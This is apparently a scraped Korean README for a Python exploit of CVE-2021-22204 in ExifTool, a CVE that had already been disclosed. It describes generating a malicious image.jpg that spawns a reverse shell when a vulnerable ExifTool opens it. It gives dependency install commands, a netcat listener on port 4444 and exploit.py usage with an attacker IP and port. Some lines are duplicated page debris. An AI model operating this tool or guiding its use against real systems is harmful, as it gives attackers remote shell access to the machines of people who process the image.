
Python 익스플로잇: CVE-2021-22204 (ExifTool) — 취약한 버전에서 처리 시 리버스 셸을 트리거하는 악성 이미지를 생성합니다.
Exiftool의 CVE-2021-22204 취약점을 위한 Python 익스플로잇입니다.
404 notfound
python3 python3-pip djvulibre-bin exiftool
apt-get install djvulibre-bin libimage-exiftool-perl python-minimal python-pip
apt-get install djvulibre-bin libimage-exiftool-perl python-minimal python-pip
pacman -S djvulibre libimage-exiftool-perl python python-pip
apt-get install djvulibre-bin libimage-exiftool-perl python-minimal python-pip
dnf install djvulibre libimage-exiftool-perl python-minimal python-pip
brew install djvulibre exiftool python
apt-get install djvulibre-bin libimage-exiftool-perl python-minimal python-pip
sudo pip install -r requirements.txt
nc -nvlp 4444
chmod +x exploit.py
python3 exploit.py {Your IP add adress} {Your Listening port}
./exploit.py {Your IP add adress} {Your Listening port}
python3 exploit.py 192.168.0.1 4444
./exploit.py 192.168.0.1 4444
image.jpg
CVE-2021-22204는 William Bowling(@wcbowling)에 의해 발견되어 보고되었습니다.
이 익스플로잇은 CVE가 이미 보고된 후 exiftool 패치를 연구하여 제작되었습니다.
그리고 image.jpg는 취약한 exiftool로 열릴 때 취약점을 트리거합니다.